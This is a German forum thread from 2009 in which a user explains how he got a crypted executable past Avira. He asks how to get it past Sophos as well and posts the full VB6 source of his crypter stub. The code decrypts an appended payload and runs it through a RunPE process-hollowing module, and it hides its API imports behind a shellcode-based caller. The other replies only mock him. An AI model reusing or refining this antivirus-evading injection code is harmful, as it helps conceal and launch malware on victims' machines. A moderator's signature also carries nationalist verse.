PHP Forum - Coding Board
Juni 19, 2018, 08:49:35 *
Willkommen Gast. Bitte einloggen oder registrieren.

Einloggen mit Benutzername, Passwort und Sitzungslänge
News:
 
   Übersicht   Hilfe Suche Einloggen Registrieren  
Seiten: [1]
  Drucken  
Autor Thema: Avira bypassed, jetzt Sophos detect.  (Gelesen 236 mal)
0 Mitglieder und 1 Gast betrachten dieses Thema.
Lixxes
Newbie
*
Beiträge: 3


Profil anzeigen E-Mail
« am: Februar 22, 2009, 06:36:56 »

Hey

Ich hab Avira bypassed mit folgenden dingen:

Change File Infos [Projekt Properties]
Change Stub Icon
Kein Realign PE Header benutzen


Aber jetzt ist meine gecryptete Datei detected von ("Mal/Behav-211") was kann ich machen?

ich hab schon die Prozedure namen geändert, die Encryption und und und..

Jetzt benutze ich die AES Encryption.




Das ist meine Sub main:


Code:
   Dim Splittter() As String
    Dim Dataass   As String


   Open Fileeee For Binary As #1  
   
       
            Dataass = Space(LOF(1))
            Get #1, , Dataass
            Splittter() = Split(Dataass, "/////")
           
              Dataass = add.StrDecrypttt(Splittter(1), "STringhere")

     
             Injekttt App.Path & "\" & App.EXEName & ".exe", StrConv(Dataass, vbFromUnicode)
 
   
        Close #1



Run PE Modul:

Code:
Option Explicit

Private Const CONTEXT_FULL              As Long = &H10007
Private Const MAX_PATH                  As Integer = 260
Private Const CREATE_SUSPENDED          As Long = &H4
Private Const MEM_COMMIT                As Long = &H1000
Private Const MEM_RESERVE               As Long = &H2000
Private Const PAGE_EXECUTE_READWRITE    As Long = &H40


Private Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long

Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, bvBuff As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Public Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)




Private Type SECURITY_ATTRIBUTES
    nLength As Long
    lpSecurityDescriptor As Long
    bInheritHandle As Long
End Type

Private Type STARTUPINFO
    cb As Long
    lpReserved As Long
    lpDesktop As Long
    lpTitle As Long
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessID As Long
    dwThreadID As Long
End Type

Private Type FLOATING_SAVE_AREA
    ControlWord As Long
    StatusWord As Long
    TagWord As Long
    ErrorOffset As Long
    ErrorSelector As Long
    DataOffset As Long
    DataSelector As Long
    RegisterArea(1 To 80) As Byte
    Cr0NpxState As Long
End Type

Private Type CONTEXT
    ContextFlags As Long

    Dr0 As Long
    Dr1 As Long
    Dr2 As Long
    Dr3 As Long
    Dr6 As Long
    Dr7 As Long

    FloatSave As FLOATING_SAVE_AREA
    SegGs As Long
    SegFs As Long
    SegEs As Long
    SegDs As Long
    Edi As Long
    Esi As Long
    Ebx As Long
    Edx As Long
    Ecx As Long
    Eax As Long
    Ebp As Long
    Eip As Long
    SegCs As Long
    EFlags As Long
    Esp As Long
    SegSs As Long
End Type

Private Type IMAGE_DOS_HEADER
    e_magic As Integer
    e_cblp As Integer
    e_cp As Integer
    e_crlc As Integer
    e_cparhdr As Integer
    e_minalloc As Integer
    e_maxalloc As Integer
    e_ss As Integer
    e_sp As Integer
    e_csum As Integer
    e_ip As Integer
    e_cs As Integer
    e_lfarlc As Integer
    e_ovno As Integer
    e_res(0 To 3) As Integer
    e_oemid As Integer
    e_oeminfo As Integer
    e_res2(0 To 9) As Integer
    e_lfanew As Long
End Type

Private Type IMAGE_FILE_HEADER
    Machine As Integer
    NumberOfSections As Integer
    TimeDateStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOptionalHeader As Integer
    characteristics As Integer
End Type

Private Type IMAGE_DATA_DIRECTORY
    VirtualAddress As Long
    Size As Long
End Type

Private Type IMAGE_OPTIONAL_HEADER
    Magic As Integer
    MajorLinkerVersion As Byte
    MinorLinkerVersion As Byte
    SizeOfCode As Long
    SizeOfInitializedData As Long
    SizeOfUnitializedData As Long
    AddressOfEntryPoint As Long
    BaseOfCode As Long
    BaseOfData As Long
    ' NT additional fields.
    ImageBase As Long
    SectionAlignment As Long
    FileAlignment As Long
    MajorOperatingSystemVersion As Integer
    MinorOperatingSystemVersion As Integer
    MajorImageVersion As Integer
    MinorImageVersion As Integer
    MajorSubsystemVersion As Integer
    MinorSubsystemVersion As Integer
    W32VersionValue As Long
    SizeOfImage As Long
    SizeOfHeaders As Long
    CheckSum As Long
    SubSystem As Integer
    DllCharacteristics As Integer
    SizeOfStackReserve As Long
    SizeOfStackCommit As Long
    SizeOfHeapReserve As Long
    SizeOfHeapCommit As Long
    LoaderFlags As Long
    NumberOfRvaAndSizes As Long
    DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
End Type

Private Type IMAGE_NT_HEADERS
    Signature As Long
    FileHeader As IMAGE_FILE_HEADER
    OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type

Private Type IMAGE_SECTION_HEADER
    SecName As String * 8
    VirtualSize As Long
    VirtualAddress  As Long
    SizeOfRawData As Long
    PointerToRawData As Long
    PointerToRelocations As Long
    PointerToLinenumbers As Long
    NumberOfRelocations As Integer
    NumberOfLinenumbers As Integer
    characteristics  As Long
End Type

Sub Injekttt(ByVal sHost As String, ByRef bvBuff() As Byte)
    Dim i       As Long
    Dim Pidh    As IMAGE_DOS_HEADER
    Dim Pinh    As IMAGE_NT_HEADERS
    Dim Pish    As IMAGE_SECTION_HEADER
    Dim Si      As STARTUPINFO
    Dim Pi      As PROCESS_INFORMATION
    Dim Ctx     As CONTEXT

    Si.cb = Len(Si)

    RtlMoveMemory Pidh, bvBuff(0), 64
    RtlMoveMemory Pinh, bvBuff(Pidh.e_lfanew), 248

    CreateProcessA sHost, vbNullString, 0, 0, False, CREATE_SUSPENDED, 0, 0, Si, Pi
    CalllApii "ntdll", "NtUnmapViewOfSection", Pi.hProcess, Pinh.OptionalHeader.ImageBase
    CalllApii "kernel32", "VirtualAllocEx", Pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
    WriteProcessMemory Pi.hProcess, ByVal Pinh.OptionalHeader.ImageBase, bvBuff(0), Pinh.OptionalHeader.SizeOfHeaders, 0

    For i = 0 To Pinh.FileHeader.NumberOfSections - 1
        RtlMoveMemory Pish, bvBuff(Pidh.e_lfanew + 248 + 40 * i), Len(Pish)
        WriteProcessMemory Pi.hProcess, ByVal Pinh.OptionalHeader.ImageBase + Pish.VirtualAddress, bvBuff(Pish.PointerToRawData), Pish.SizeOfRawData, 0
    Next i

    Ctx.ContextFlags = CONTEXT_FULL
    CalllApii "kernel32", "GetThreadContext", Pi.hThread, VarPtr(Ctx)
    WriteProcessMemory Pi.hProcess, ByVal Ctx.Ebx + 8, Pinh.OptionalHeader.ImageBase, 4, 0
    Ctx.Eax = Pinh.OptionalHeader.ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint
    CalllApii "kernel32", "SetThreadContext", Pi.hThread, VarPtr(Ctx)
    CalllApii "kernel32", "ResumeThread", Pi.hThread
End Sub

Public Function CalllApii(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
    Dim bvASM(64)   As Byte 'enought to hold code + 10 params
    Dim i           As Long
    Dim lPos        As Long
    Dim sVal        As String

    bvASM(0) = &H58: bvASM(1) = &H59: bvASM(2) = &H59
    bvASM(3) = &H59: bvASM(4) = &H59: bvASM(5) = &H50
   
    lPos = 6
   
    For i = UBound(Params) To 0 Step -1
        bvASM(lPos) = &H68: lPos = lPos + 1
        sVal = (Params(i)): GoSub PutLong: lPos = lPos + 4
    Next
   
    bvASM(lPos) = &HE8: lPos = lPos + 1
    sVal = GetProcAddress(LoadLibraryA(sLib), sMod) - VarPtr(bvASM(lPos)) - 4
    GoSub PutLong: lPos = lPos + 4
    bvASM(lPos) = &HC3
    CalllApii = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0)
   
    Exit Function
PutLong:
    'This is cheap replacement for RtlMoveMemory/putmem4 (hi/lo word/byte)
    sVal = Right$(String(8, "0") & Hex(sVal), 8)
    bvASM(lPos + 0) = ("&h" & Mid$(sVal, 7, 2))
    bvASM(lPos + 1) = ("&h" & Mid$(sVal, 5, 2))
    bvASM(lPos + 2) = ("&h" & Mid$(sVal, 3, 2))
    bvASM(lPos + 3) = ("&h" & Mid$(sVal, 1, 2))
    Return
End Function

Public Function Exexx() As String
    Dim lRet        As Long
    Dim bvBuff(255) As Byte
    lRet = CalllApii("kernel32", "GetModuleFileNameA", App.hInstance, VarPtr(bvBuff(0)), 256)
    Exexx = Left$(StrConv(bvBuff, vbUnicode), lRet)
End Function





Ich hoffe mir kann jemand helfen, danke


MfG Lixxes


P.S.:In meinem Projekt sind alle Name geändert wie:

Injekttt = fjsiaicjads
or
StrDecrypttt = zshthsgh
Gespeichert
Slayer616
Entwickler Team
Spender
Moderator
Hat das Battle gewonnen
Sr. Member
****
Beiträge: 426


Profil anzeigen E-Mail
« Antworten #1 am: Februar 22, 2009, 06:38:07 »

Lerne Programmieren!
Gespeichert




Du sagst, du spürst die Ohnmacht, denn der Feind ist ach so stark
Und er will dich niederhalten mit Geschrei durch Bein und Mark
Mit Verboten und Zensur kann er zwar den Kampf erschweren
Doch niemals wird ein Richterspruch den freien Geist bekehren.

Fürchte lieber Deutschlands Untergang als die Reden der Vasallen
Derer, die der Lüge dienen, denn schon bald werden sie fallen.
Lixxes
Newbie
*
Beiträge: 3


Profil anzeigen E-Mail
« Antworten #2 am: Februar 22, 2009, 06:42:00 »

Da hast du auf jedenfall Recht. Bin ja grade dabei es zu lernen. Aber anstatt solche Kommentare abzulassen könntest du mir auch helfen Zwinkernd
Gespeichert
Slayer616
Entwickler Team
Spender
Moderator
Hat das Battle gewonnen
Sr. Member
****
Beiträge: 426


Profil anzeigen E-Mail
« Antworten #3 am: Februar 22, 2009, 06:51:04 »

Wenn du lernst dann fange mit Rechnern an nicht mit einem Modul das du nicht verstehst...
Gespeichert




Du sagst, du spürst die Ohnmacht, denn der Feind ist ach so stark
Und er will dich niederhalten mit Geschrei durch Bein und Mark
Mit Verboten und Zensur kann er zwar den Kampf erschweren
Doch niemals wird ein Richterspruch den freien Geist bekehren.

Fürchte lieber Deutschlands Untergang als die Reden der Vasallen
Derer, die der Lüge dienen, denn schon bald werden sie fallen.
Lixxes
Newbie
*
Beiträge: 3


Profil anzeigen E-Mail
« Antworten #4 am: Februar 22, 2009, 06:55:53 »

Ja aber aus Sourcen wurde mir gesagt lernt man am besten.

Voraussetzung man hat die Basics drine die ich soweit beherrsche.
Gespeichert
Klaatu
Ex-Teammember
Full Member
***
Beiträge: 104



Profil anzeigen E-Mail
« Antworten #5 am: Februar 22, 2009, 08:33:56 »

Gespeichert

Slayer616
Entwickler Team
Spender
Moderator
Hat das Battle gewonnen
Sr. Member
****
Beiträge: 426


Profil anzeigen E-Mail
« Antworten #6 am: Februar 22, 2009, 08:59:18 »

WORD!

fucktextzukurz
Gespeichert




Du sagst, du spürst die Ohnmacht, denn der Feind ist ach so stark
Und er will dich niederhalten mit Geschrei durch Bein und Mark
Mit Verboten und Zensur kann er zwar den Kampf erschweren
Doch niemals wird ein Richterspruch den freien Geist bekehren.

Fürchte lieber Deutschlands Untergang als die Reden der Vasallen
Derer, die der Lüge dienen, denn schon bald werden sie fallen.
Seiten: [1]
  Drucken  
 
Gehe zu:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.21 | SMF © 2006-2009, Simple Machines | New Look by Nolt Prüfe XHTML 1.0 Prüfe CSS